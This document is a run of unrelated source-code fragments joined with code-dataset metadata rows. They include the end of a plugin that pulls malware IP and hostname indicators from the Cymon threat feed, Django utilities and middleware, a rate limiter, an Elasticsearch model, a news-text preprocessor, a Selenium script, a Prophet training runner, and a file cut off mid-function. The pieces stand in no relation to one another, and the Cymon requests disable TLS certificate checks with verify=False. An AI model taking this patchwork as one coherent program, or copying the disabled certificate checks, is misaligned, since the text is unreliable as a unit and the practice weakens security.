LOGGING.exception(sys.exc_info())
LOGGING.exception(type(e))
LOGGING.exception(e.args)
LOGGING.exception(e)
return 0
def get_cymon_feed(jwt, feed_id, pages):
"""Produce a list of URLs for IPs found in the feed.
Params:
- jwt: (type: string) JWT token.
- feed_id: (type: string) Cymon feed ID.
- pages: (type: int) number of pages to retrieve.
Returns:
- url_list: (type: MalwareUrl list) list of malware URLs.
"""
try:
today = datetime.utcnow()
threshold = today - timedelta(days=BASECONFIG.malware_days)
headers = {'Authorization': 'Bearer {0}'.format(jwt)}
LOGGING.info('Fetching data from Cymon feed: {0}'.format(feed_id))
ip_list = []
for n in range(1, pages + 1):
payload = {
'startDate': threshold.strftime('%Y-%m-%d'),
'endDate': today.strftime('%Y-%m-%d'),
'size': BATCH_SIZE,
'from': (
BATCH_SIZE *
n -
BATCH_SIZE)}
request = requests.get(
'https://api.cymon.io/v2/ioc/search/feed/{0}'.format(feed_id),
params=payload,
headers=headers,
verify=False)
if request.status_code == 200:
LOGGING.info('Request successful!')
response = json.loads(request.text)
if 'hits' in response:
for feed_entry in response['hits']:
if 'ioc' in feed_entry:
if 'ip' in feed_entry['ioc']:
mal_ip = feed_entry['ioc']['ip']
if mal_ip not in ip_list:
ip_list.append(mal_ip)
elif 'hostname' in feed_entry['ioc']:
host_name = feed_entry['ioc']['hostname']
mal_ip = resolve_dns(host_name)
if mal_ip:
if mal_ip not in ip_list:
ip_list.append(mal_ip)
else:
LOGGING.error(
'Problem connecting to Cymon. Status code:{0}. Please try again later.'.format(
request.status_code))
if len(ip_list) > 0:
url_list = []
for ip_addr in ip_list:
ip_results = get_urls_for_ip(ip_addr, NAME)
if len(ip_results) > 0:
url_list.extend(ip_results)
return url_list
else:
LOGGING.warning('No hosts of interest.')
except requests.exceptions.ConnectionError as e:
LOGGING.warning('Problem connecting to Cymon. Error: {0}'.format(e))
except Exception as e:
LOGGING.warning('Problem connecting to Cymon. Aborting task.')
LOGGING.exception(sys.exc_info())
LOGGING.exception(type(e))
LOGGING.exception(e.args)
LOGGING.exception(e)
return []
def get_malwareurl_list():
"""Produce a list of malware URLs from Cymon feeds.
Returns:
- return_list: (type: MalwareUrl list) list of malware URLs.
"""
jwt = cymon_auth()
if jwt:
return_list = []
for feed in FEED_LIST:
LOGGING.info('Processing feed: {0}'.format(feed))
feed_size = get_cymon_feed_size(jwt, feed)
if feed_size > 0:
pages = int(math.ceil(feed_size / BATCH_SIZE))
if pages < 1:
pages = 1
url_list = get_cymon_feed(jwt, feed, pages)
if len(url_list) > 0:
return_list.extend(url_list)
return return_list
else:
LOGGING.warning('No Cymon authentication token. Cannot query API.')
return []
| phage-nz/ph0neutria | core/plugins/cymon.py | cymon.py | py | 8,062 | python | en | code | 299 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"... |
71104422184 | #!/usr/bin/env python
# -*- coding=UTF-8 -*-
# Created at Mar 20 19:50 by BlahGeek@Gmail.com
import sys
if hasattr(sys, 'setdefaultencoding'):
sys.setdefaultencoding('UTF-8')
import logging
from datetime import datetime, timedelta
from treehole.renren import RenRen
import os
from treehole.models import ContentModel, BlockIpModel
from ipaddr import IPNetwork, IPAddress
def needRecaptchar(addr, content):
if ContentModel.objects.filter(
ip=addr,
time__range=(datetime.now()-timedelta(hours=24), \
datetime.now())
).count() > 2:
return True
return False
def checkIP(addr):
IPS = (
IPNetwork('59.66.0.0/16'),
IPNetwork('166.111.0.0/16'),
IPNetwork('101.5.0.0/16'),
IPNetwork('219.223.160.0/19'),
# private address
IPNetwork('127.0.0.0/8'),
IPNetwork('10.0.0.0/8'),
IPNetwork('192.168.0.0/16'),
)
if BlockIpModel.objects.filter(ip=addr).count() > 0:
return False
return any([IPAddress(addr) in x for x in IPS])
def postRawStatu(text):
""" Post status without number, without saving to db"""
r = RenRen()
r.postStatus(text)
def postStatu(text, ipaddr='127.0.0.1'):
""" Post status, start with '#xxx', saving to db"""
new_content = ContentModel(ip=ipaddr,
time=datetime.now(),
content=text)
new_content.save()
number = ContentModel.objects.count()
text = '#' + str(number) + ' ' + text
postRawStatu(text)
MSG = {
'IP_NOT_VALID': '不允许您的IP发布',
'CONTENT_TOO_LONG': '状态长度应该在6-100字之间',
'TOO_MANY_TIMES': '每个IP相邻发布时间不能小于30分钟',
'PUBLISH_ERROR': '服务器错误,发布失败',
'RECAPTCHA_INCORRECT': '验证码错误',
'RECAPTCHA_NEEDED': '请输入验证码',
'PUBLISH_OK': '发布成功!'}
COLORS = [
('#1abc9c', '#16a085'),
('#2ecc71', '#27ae60'),
('#3498DB', '#2980B9'),
('#9B59B6', '#8E44AD'),
('#34495E', '#2C3E50'),
('#F1C40F', '#F39C12'),
('#E67E22', '#D35400'),
('#E74C3C', '#C0392B'),
('#95A5A6', '#7F8C8D')
]
| blahgeek/treehole | treehole/utils.py | utils.py | py | 2,317 | python | en | code | 30 | github-code | 36 | [
{
"api_name": "sys.setdefaultencoding",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "treehole.models.ContentModel.objects.filter",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "treehole.models.ContentModel.objects",
"line_number": 17,
"usage_type":... |
13070318133 | import time, collections
class RateLimiter:
def __init__(self, max_number, interval):
self.timeStamp = collections.defaultdict(collections.deque)
self.interval = interval
self.max_number = max_number
def call(self, id):
currTime = time.time()
if len(self.timeStamp[id]) < self.max_number:
self.timeStamp[id].append(currTime)
return True
else:
if currTime - self.timeStamp[id][0] > self.interval:
self.timeStamp[id].popleft()
self.timeStamp[id].append(currTime)
return True
else:
return False
rateLimiter = RateLimiter(5, 2)
for i in range(10):
print(rateLimiter.call(1))
time.sleep(1)
for i in range(5):
print(rateLimiter.call(2))
| Jason003/Interview_Code_Python | stripe/rate limiter.py | rate limiter.py | py | 813 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "time.time",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "time.sleep",
... |
9385088011 | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 27 01:30:02 2022
@author: Syeda Fatima Zahid
"""
import time
import datetime
import pandas as pd
ticker = 'MSFT'
period1 = int(time.mktime(datetime.datetime(2020, 12, 1, 23, 59).timetuple()))
period2 = int(time.mktime(datetime.datetime(2020, 12, 31, 23, 59).timetuple()))
interval = '1d' # 1d, 1m
url = f'https://query1.finance.yahoo.com/v7/finance/download/{ticker}?period1={period1}&period2={period2}&interval={interval}&events=history&includeAdjustedClose=true'
data = pd.read_csv(url)
print(data)
data.to_csv('MSFT.csv') | syedafatimah/Stock-Price-Analyzer | Prediction Using Numerical Data/Data Extraction.py | Data Extraction.py | py | 576 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.mktime",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "time.mktime",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"li... |
41614185208 | from django.shortcuts import HttpResponseRedirect
from django.http import JsonResponse
from urllib.parse import quote
class AuthRequiredMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
# Code to be executed for each request before the view (and later middleware) are called.
if not request.user.is_authenticated and request.path != "/login/":
if request.headers.get("x-requested-with") == "XMLHttpRequest":
return JsonResponse(
{
"status": "false",
"message": "You don't have permission to access this resource",
},
status=403,
)
path = quote(request.get_full_path())
return HttpResponseRedirect(f"/login/?next={path}")
# Code to be executed for each request/response after the view is called.
response = self.get_response(request)
return response
| comiconomenclaturist/django-icecast-stats | stats/middleware.py | middleware.py | py | 1,051 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "django.http.JsonResponse",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "urllib.parse.quote",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.HttpResponseRedirect",
"line_number": 22,
"usage_type": "call"
}
] |
36255089286 | import setuptools
NAME = "oka"
VERSION = "0.2108.0"
AUTHOR = 'Rafael A. Bizao, Davi P. dos Santos'
AUTHOR_EMAIL = 'rabizao@gmail.com'
DESCRIPTION = 'Python client for oka'
with open('README.md', 'r') as fh:
LONG_DESCRIPTION = fh.read()
LICENSE = 'GPL3'
URL = 'https://github.com/davips/lange'
DOWNLOAD_URL = 'https://github.com/davips/lange/releases'
CLASSIFIERS = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3 :: Only',
]
INSTALL_REQUIRES = [
'requests', 'python-dotenv', 'idict'
]
EXTRAS_REQUIRE = {
'dev': ['check-manifest'],
'test': ['coverage'],
}
SETUP_REQUIRES = ['wheel']
setuptools.setup(
name=NAME,
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
download_url=DOWNLOAD_URL,
extras_require=EXTRAS_REQUIRE,
install_requires=INSTALL_REQUIRES,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
license=LICENSE,
packages=setuptools.find_packages(),
setup_requires=SETUP_REQUIRES,
url=URL,
keywords='data, repository, archive, data science, machine learning', # Optional
project_urls={ # Optional
'Bug Reports': 'https://github.com/rabizao/oka/issues',
'Source': 'https://github.com/rabizao/oka',
},
)
package_dir = {'': '.'} # For IDEs like Intellij to recognize the package.
| rabizao/oka | setup.py | setup.py | py | 1,764 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 58,
"usage_type": "call"
}
] |
13782320879 | from fastapi import APIRouter
from conn import conn
from model.kitchen import Kitchen
kitchen_router = APIRouter(
prefix="/kitchen",
tags=["kitchen"],
)
@kitchen_router.get("/")
async def read_items(attr: list, where: dict):
cursor = conn.cursor()
sql = Kitchen.querySql(attr=attr, where=where)
cursor.execute(sql)
lines = cursor.fetchall()
return {'values': lines}
@kitchen_router.post("/")
async def insert_item(kitchen: Kitchen):
cursor = conn.cursor()
sql = kitchen.insertSql()
cursor.execute(sql)
conn.commit()
return {'added':kitchen}
@kitchen_router.delete("/")
async def delete_item(where: dict):
cursor = conn.cursor()
sql = Kitchen.deleteSql(where=where)
cursor.execute(sql)
conn.commit()
return {'deleted': where}
@kitchen_router.put("/")
async def update_items(attrDict: dict, where: dict):
cursor = conn.cursor()
sql = Kitchen.updateSql(where=where, attrDict=attrDict)
cursor.execute(sql)
conn.commit()
return {'updated': attrDict, 'where': where}
| JulioHey/Banco-de-Dados---EP | server/router/kitchen.py | kitchen.py | py | 1,060 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "conn.conn.cursor",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "conn.conn",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "model.kitchen.Kitchen.que... |
36899051077 | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
import math
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import Axes3D
#Global Variables
num_iter=0
saved_theta=np.zeros((2, 1))
cost=np.zeros(1)
def h(X, theta):
return np.dot(X, theta)
def Jtheta(X, Y, theta):
return 1/2.0*np.sum((h(X, theta)-Y)**2)
def linear_prediction(x, theta):
return theta[0] + theta[1]*x
def normal(X, Y):
return np.dot(np.linalg.inv(np.dot(X.T, X)), np.dot(X.T, Y))
def gradient_descent(X, Y, alpha, theta_in):
i=0
epsilon=1e-15
theta=theta_in;
global saved_theta
global num_iter
global cost
saved_theta=theta_in
J=Jtheta(X, Y, theta)
cost=J
while (True):
Jprev=Jtheta(X, Y, theta)
theta_new= theta + (alpha)*np.dot(X.T, (Y-h(X, theta)))
Jnew=Jtheta(X, Y, theta_new)
if math.fabs(Jnew-Jprev)<epsilon:
break
theta=theta_new
saved_theta=np.hstack((saved_theta, theta))
cost=np.vstack((cost, Jnew))
i=i+1
num_iter=i
print('Number of iterations', i)
return theta
Xtemp = np.loadtxt('linearX.csv', delimiter=',') #array of X
ytemp = np.loadtxt('linearY.csv', delimiter=',')[np.newaxis] #converting 1d array into 2d matrix using np.newaxis
ones = np.ones(len(Xtemp))
#Normalizing the data
mean = np.mean(Xtemp)
sigma = np.std(Xtemp)
Xtemp = (Xtemp - mean)/sigma
Xtemp1 = np.vstack((ones, Xtemp))
X=Xtemp1.T.copy() #taking transpose of X
Y=ytemp.T.copy() #taking transpose of Y
alpha=0.0001
theta=[[0.], [0.]]
#part a
theta_optimal=gradient_descent(X, Y, alpha, theta)
print('Optimal value of theta', theta_optimal)
print('Analytical solution is', normal(X, Y))
#part b
plt.plot(Xtemp, Y, 'ro')
plt.plot(Xtemp, np.dot(X, theta_optimal))
plt.xlabel('Aciditiy')
plt.ylabel('Density')
plt.show()
def createJ_plot(Theta_0, Theta_1):
Theta = np.matrix([[Theta_0], [Theta_1]])
return ((Y - X * Theta).T * (Y - X * Theta) / (2*X.shape[0])).item(0)
#part c
#3D mesh
fig=plt.figure()
ax = fig.add_subplot(111, projection='3d')
theta_0_plot=np.arange(-4, 4, 0.05)[np.newaxis]
theta_1_plot=np.arange(-1, 1, 0.002)[np.newaxis] #Make it 4
theta_0_plot, theta_1_plot=np.meshgrid(theta_0_plot, theta_1_plot)
J_plot=np.vectorize(createJ_plot)(theta_0_plot, theta_1_plot)
ax.plot_surface(theta_0_plot, theta_1_plot, J_plot, cmap=plt.cm.jet, rstride=1, cstride=1, linewidth=0)
plt.show()
| ashishgupta97/Machine-Learning | LinearRegression.py | LinearRegression.py | py | 2,417 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.dot",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 16,
... |
31410757057 | from django.db import models
from django.contrib.auth import get_user_model
# Create your models here.
class MailList(models.Model):
"""
database table that stores all
users that subscribe to recieve notifications
"""
user = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)
recieve_email_notifications = models.BooleanField(default=True)
recieve_push_notifications = models.BooleanField(default=True)
@classmethod
def did_subscribe_for_email_notifications(cls, user):
"""
check if a particular user is
subscribed to recieve email notifications
"""
result = MailList.objects.get_or_create(user=user)
return result[0].recieve_email_notifications
@classmethod
def did_subscribe_for_push_notifications(cls, user):
"""
check if a particular user is
subscribed to recieve email notifications
"""
result = MailList.objects.get_or_create(user=user)
return result[0].recieve_push_notifications
| andela/ah-backend-valkyrie | authors/apps/notify/models.py | models.py | py | 1,042 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.models.Model",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.db.models.ForeignKey",
"line_number": 11,
"usage_type": "call"
},
{
"api_name":... |
16117948354 | import os
from builtins import classmethod, int
from datetime import datetime
from models.country import Country
from es import es
class State:
def __init__(self):
pass
@classmethod
def list(cls, country):
if country != "":
state_data = es.search(
index=os.environ.get("INDEX"),
body={
'size': 10000,
'query': {"bool": {"must": [{"match": {"_type": "state"}}, {"match": {"country": country}}]}}
},
filter_path=['hits.hits._id', 'hits.hits._source', 'hits.hits._parent']
)
else:
state_data = es.search(
index=os.environ.get("INDEX"),
body={
'size': 10000,
'query': {"match": {"_type": "state"}}
},
filter_path=['hits.hits._id', 'hits.hits._source', 'hits.hits._parent']
)
states = []
if 'hits' in state_data and 'hits' in state_data['hits']:
states = [
{"id": data["_id"], "name": data["_source"]["name"]+" - "+data["_parent"], "parent": data["_parent"],
"country": data["_source"]["country"]}
for data in state_data['hits']['hits']
if "_parent" in data
]
return states
@classmethod
def get(cls, id):
state_data = es.search(index=os.environ.get("INDEX"),
body={'query': {"bool": {"must": [{"match": {"_type": "state"}},
{'match': {'_id': id}},
]}}})
if 'hits' in state_data and 'hits' in state_data['hits']:
return {"id": state_data['hits']['hits'][0]['_id'],
"name": state_data['hits']['hits'][0]["_source"]["name"],
"parent": state_data['hits']['hits'][0]["_parent"],
"country": state_data['hits']['hits'][0]["_source"]["country"]}
return False
@classmethod
def create(cls, name, country):
country_rec = Country.get(country)
if country_rec:
id = int(datetime.timestamp(datetime.now()) * 1000)
body = {"name": name, "country": country_rec["name"]}
res = es.index(index=os.environ.get("INDEX"), doc_type='state', id=id, parent=country_rec["id"], body=body)
if "created" in res and res["created"]:
return True
return False
@classmethod
def edit(cls, id, name, country):
country_rec = Country.get(country)
if country_rec:
res = es.index(index=os.environ.get("INDEX"), doc_type='state', id=id, parent=country_rec["id"],
body={"name": name, "country": country_rec["name"]})
if "result" in res and res["result"] == "updated":
return True
return False
@classmethod
def delete(cls, id, country):
state_rec = State.get(id)
if state_rec:
res = es.delete(index=os.environ.get("INDEX"), doc_type='state', id=id, parent=country)
if "found" in res and res["found"] and "result" in res and res["result"] == "deleted":
return True
return False
| RakeshMallesh123/flask-elasticsearch | models/state.py | state.py | py | 3,380 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "es.es.search",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "es.es",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "os.environ.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 18,... |
31282026948 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import tensorflow as tf
from bs4 import BeautifulSoup
from pagi.utils.embedding import Embedding
def main(args):
print("Args:", args)
# data_dir = '/home/dave/agi/ptb_err'
# count_file = 'error_count.csv'
# dist_file = 'error_hist.csv'
embedding_file = './ptb_embedding.txt'
#input_file = '/home/dave/agi/reuters_news/reuters21578/reut2-000.sgm'
#output_file = 'reuters.txt'
input_file = args[1]
output_file = args[2]
e = Embedding()
e.clear()
e.read(embedding_file)
f = open(input_file, 'r')
data = f.read()
#print( 'data: ', data)
# Must replace body with content tags, for reasons
# See: https://stackoverflow.com/questions/15863751/extracting-body-tags-from-smg-file-beautiful-soup-and-python
data_replaced = data.replace('<BODY>', '<content>')
data_replaced = data_replaced.replace('</BODY>', '</content>')
# Parse the modified content
tag = 'content'
unknown_token = '<unk>'
number_token = 'N'
num_footer_tags = 2 # Reuters always has a footer at the end
# https://www.crummy.com/software/BeautifulSoup/bs4/doc/#contents-and-children
soup = BeautifulSoup(data_replaced)
articles = soup.findAll(tag) # find all body tags
print('Have ', len(articles), ' articles.') # print number of body tags in sgm file
i = 0
corpus = ''
# Loop through each body tag and print its content
for article in articles: # pylint: disable=too-many-nested-blocks
content = article.contents
if i < 10:
print('Article: ', content)
print('| ')
output = ''
output_list = []
tokens = content[0].split() # on whitespace
num_tokens = len(tokens)
for j in range(num_tokens-num_footer_tags):
input_token = tokens[j]
token = input_token.strip()
# force lowercase
token = token.lower()
# remove ALL commas (there are none in PTB)
#token = token.replace('\n', ' ')
# remove ALL commas (there are none in PTB)
token = token.replace(',', '')
# replace dlrs with $
token = token.replace('dlrs', '$')
token = token.replace('dlr', '$')
# replace mln
token = token.replace('mln', 'million')
token = token.replace('bln', 'billion')
token = token.replace('trn', 'trillion')
# replace tonnes
token = token.replace('tonnes', 'tons')
# replace pct with percent
token = token.replace('pct', 'percent')
# remove trailing periods
end_of_sentence = False
if token.endswith('.'):
end_of_sentence = True
token = token[:-1]
# replace the angle brackets around proper nouns
token = token.replace('<', '')
token = token.replace('>', '')
# replace numbers with N
try:
float(token)
token = number_token
except ValueError:
pass
# https://stackoverflow.com/questions/5917082/regular-expression-to-match-numbers-with-or-without-commas-and-decimals-in-text
is_number = re.search('(?<!\S)(?=.)(0|([1-9](\d*|\d{0,2}(,\d{3})*)))?(\.\d*[1-9])?(?!\S)', token) # pylint: disable=anomalous-backslash-in-string
if is_number:
token = number_token
# space before 's and 're etc.
# was n't did n't etc.
#if token == 'didn\'t':
suffix = None
recognized = False
if token.endswith('n\'t'):
suffix = ' n\'t' # split into 2 tokens
token = token.replace('n\'t', '')
elif token.endswith('\'s'):
suffix = ' \'s' # split into 2 tokens
token = token.replace('\'s', '')
elif token.endswith('\'re'):
suffix = ' \'re' # split into 2 tokens
token = token.replace('\'re', '')
# replace unknown tokens with UNK
if not recognized:
has_key = e.has_key(token)
if not has_key:
token = unknown_token
#if i<10:
# print('Original: ', input_token, ' TOKEN: |', token, '| In dict?: ', has_key, ' EOS?: ', end_of_sentence)
output_list.append(token)
if suffix is not None:
output_list.append(suffix)
#output = output + token + suffix
#output = output + ' '
if end_of_sentence:
# Reorder some common tokens where the style is peculiar to a particular outlet
# Reuters style: N million $ N $ N million $
# PTB (WSJ): $ N million $ N $ N billion
output_length = len(output_list)
for k in range(output_length):
if k > 0:
output_token_1 = output_list[k-1]
output_token_2 = output_list[k]
# N $ --> $ N
if (output_token_1 == 'N') and (output_token_2 == '$'):
output_list[k-1] = '$'
output_list[k] = 'N'
elif k > 1:
output_token_0 = output_list[k-2]
if output_token_0 == 'N' and output_token_1 in ['million', 'billion', 'trillion'] and (
output_token_2 == '$'):
output_list[k-2] = '$'
output_list[k-1] = 'N'
output_list[k] = output_token_1
# Copy the final list to the output buffer
for k in range(output_length):
output_token = output_list[k]
output = output + output_token + ' '
# Add EOS marker
output = output + '\n'
# Clear the token list
output_list = [] # reset list
if i < 10:
print('ArticTx: ', output)
print('--------------\n\n')
# assemble the final corpus line, add newline at end
corpus = corpus + output
i = i + 1
print('Articles: ', i)
with open(output_file, 'a') as text_file:
text_file.write(corpus)
if __name__ == '__main__':
tf.app.run()
| Cerenaut/rsm | rsm/scripts/preprocess_reuters.py | preprocess_reuters.py | py | 5,812 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pagi.utils.embedding.Embedding",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "tensorflo... |
38384503953 | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import logging
import datetime
logname = "Trying"+datetime.date.today().strftime("%d-%m-%Y")+".log"
logging.basicConfig(filename=logname,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S',
level=logging.INFO)
chrome_driver_path = "C:/Support/chromedriver.exe"
logging.info(chrome_driver_path)
driver = webdriver.Chrome(chrome_driver_path)
driver.get("http://www.python.org")
search_tab = driver.find_element_by_xpath("//input[(@id='id-search-field') and (@name='q')]")
print("id of bsearch tab is: " + search_tab.get_attribute('id'))
logging.info("id of bsearch tab is: " + search_tab.get_attribute('id'))
search_tab.clear()
search_tab.send_keys("python 2.7")
go_btn = driver.find_element_by_xpath("//button[(@type='submit') and (contains(text(),'GO'))]")
go_btn.click()
#ques = driver.find_element_by_xpath("//a[@value='Questions')]")
#print("question tab got" + ques)
#assert "Python" in driver.title
#elem = driver.find_element_by_name("q")
#elem.clear()
#elem.send_keys("pycon")
#elem.send_keys(Keys.RETURN)
#assert "No results found." not in driver.page_source
driver.close()
#driver.quit() | amynav/Testing_repo | trying.py | trying.py | py | 1,339 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.date.today",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "logging.basicConfig",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "logging.INFO"... |
40600848751 | from django.core.exceptions import ObjectDoesNotExist
from django.shortcuts import render
from watchlist.models import Movie
from django.http import JsonResponse
# Create your views here.
def movie_list(request):
movies = Movie.objects.all()
data = {
'movies': list( movies.values() )
}
return JsonResponse( data )
def movie_details(request, movie_id):
data = dict()
try:
movie = Movie.objects.get( pk=movie_id )
data['name'] = movie.name
data['description'] = movie.description
data['active'] = movie.active
except ObjectDoesNotExist:
data['error'] = "Invalid Movie id"
return JsonResponse(data)
| shubham2637/DRF | watchmate/watchlist/views.py | views.py | py | 684 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "watchlist.models.Movie.objects.all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "watchlist.models.Movie.objects",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "watchlist.models.Movie",
"line_number": 11,
"usage_type": "name"
... |
35620233152 | """Runs training and evaluation of Prophet models."""
import importlib
import json
import os
import sys
from pathlib import Path
import click
import matplotlib.pyplot as plt
import mlflow
from dask import distributed
from prophet import plot
from prophet.diagnostics import cross_validation, performance_metrics
from prophet.serialize import model_to_json
import utils
config = utils.read_config()
# Client needs to this set (along with S3 creds if perms required)
# Also need to set envvar
# - AWS_ACCESS_KEY_ID to minio-user (see mlflow minio vault in ansible)
# - AWS_SECRET_ACCESS_KEY to minio-user-password
os.environ['MLFLOW_S3_ENDPOINT_URL'] = config['mlflow_s3_endpoint_url']
def __load_model(model):
"""Given path to model, return loaded Prophet model."""
# boilerplate: https://docs.python.org/3/library/importlib.html
model_name = model.name.split('.')[0]
spec = importlib.util.spec_from_file_location(model_name, model)
model_module = importlib.util.module_from_spec(spec)
sys.modules['model_module'] = model_module
spec.loader.exec_module(model_module)
return model_module.model()
@click.command()
@click.option('--data_path', default=config['station_file_path'], type=Path, help='Path to station data directory')
@click.option('--tracking_uri', default=config['tracking_uri'], type=str, help='URI to MLFlow tracking')
@click.option('--artifact_path', default=config['artifact_path'], type=Path, help='Path to directory where artifacts will be saved')
@click.option('--git_tag', default=config['git_tag'], type=str, help='DVC git tag (version of data)')
@click.option('--save_model', is_flag=True, help='Save model')
@click.option('--dask', default=None, type=str, help='URL to connect to Dask to parallelize cross validation')
@click.argument('model')
@click.argument('station')
@click.argument('experiment')
def run_model(model, station, experiment, data_path, tracking_uri, artifact_path, git_tag, save_model, dask):
script_name = Path(__file__).name.split('.py')[0]
mlflow.set_tracking_uri(tracking_uri)
mlflow.set_experiment(experiment)
artifact_path = Path(artifact_path)
artifact_path.mkdir(exist_ok=True)
# Load data
# - set cap and floor as physical bounds and bounds respected by logistic growth models
station_df = utils.load_station(data_path, station)
station_df['cap'] = 1
station_df['floor'] = 0
model = Path(model)
if station == 'all':
stations = utils.STATIONS
else:
stations = [station]
if dask:
client = distributed.Client(dask)
parallel = "dask"
else:
parallel = "threads"
for station in stations:
with mlflow.start_run(run_name=f'{script_name}-{model}') as active_run:
mlflow.set_tags(
{
'git-tag': git_tag,
'station': station,
'model': model
}
)
# Load model
model = __load_model(model)
# - fit model
model.fit(station_df)
# Calculate metrics from cross validation
# - Start cross-validation every 30 days and forecast for next 180
metric_keys = ["mse", "rmse", "mae", "mape", "mdape", "smape", "coverage"]
df_cv = cross_validation(
model=model,
period="30 days",
horizon="180 days",
parallel=parallel,
disable_tqdm=True,
)
cv_metrics = performance_metrics(df_cv)
# if some metrics are close to 0 they are not included, so need to check that
metrics = {k: cv_metrics[k].mean() for k in metric_keys if k in cv_metrics.keys()}
# Create forecast
future = model.make_future_dataframe(periods=365)
forecast = model.predict(future)
# this is the fake SST because we don't have that information now
# - for illustrative purposes
forecast['sst'] = station_df['sst'].copy()
guess_temp = station_df['sst'].iloc[-52::].values.copy()
forecast['sst'].iloc[-52::] = guess_temp
# Log metrics
mlflow.log_metrics(metrics)
# Log model params
params = utils.extract_model_params(model)
mlflow.log_params(params)
# Save image
fig, axes = plt.subplots(nrows=3, figsize=(10, 8))
# - Station data
axes[0].plot(station_df.ds, station_df.y)
axes[0].set_ylabel('Ice coverage')
ax2 = axes[0].twinx()
ax2.plot(station_df.ds, station_df.sst, color='r')
ax2.set_ylabel('SST')
# - Cross-validation plot with error
plot.plot_cross_validation_metric(df_cv, metric='rmse', ax=axes[1])
# - Forecast
model.plot(forecast, ax=axes[2], ylabel='Ice coverage')
plot.add_changepoints_to_plot(axes[2], model, forecast)
image_path = artifact_path / 'training'
image_path.mkdir(exist_ok=True)
fname = image_path / f'{station}.png'
fig.savefig(fname)
plt.close(fig)
mlflow.log_artifact(str(fname))
# Save forecast image (annoyingly doesn't take ax)
fig = model.plot_components(forecast)
fname = image_path / f'{station}-forecast-components.png'
fig.savefig(fname)
plt.close(fig)
mlflow.log_artifact(str(fname))
if save_model:
model_path = artifact_path / 'station-models'
model_path.mkdir(exist_ok=True)
fname = model_path / f'{station}-model.json'
with open(fname, 'w') as fout:
json.dump(model_to_json(model), fout)
# Saves as a runnable artifact. we'll start with just the json file
# mlflow.prophet.save_model(model, f'{station-model}.json')
if __name__ == '__main__':
run_model()
| axiom-data-science/project-s2s-sea-ice-guidance | src/experiments/runner.py | runner.py | py | 6,063 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.read_config",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "importlib.util.spec_from_file_location",
"line_number": 31,
"usage_type": "call"
},
{
"api_name... |
16568956344 | from RW import readAll
import os
import json
from PrettyPrint import pretty, prettyJarInfo, prettyNameSpace1, prettyElementKind
import sys
#pathToRawData = r"C:\Users\t-amketk\RawData\RawData"
def get_all_projects(path):
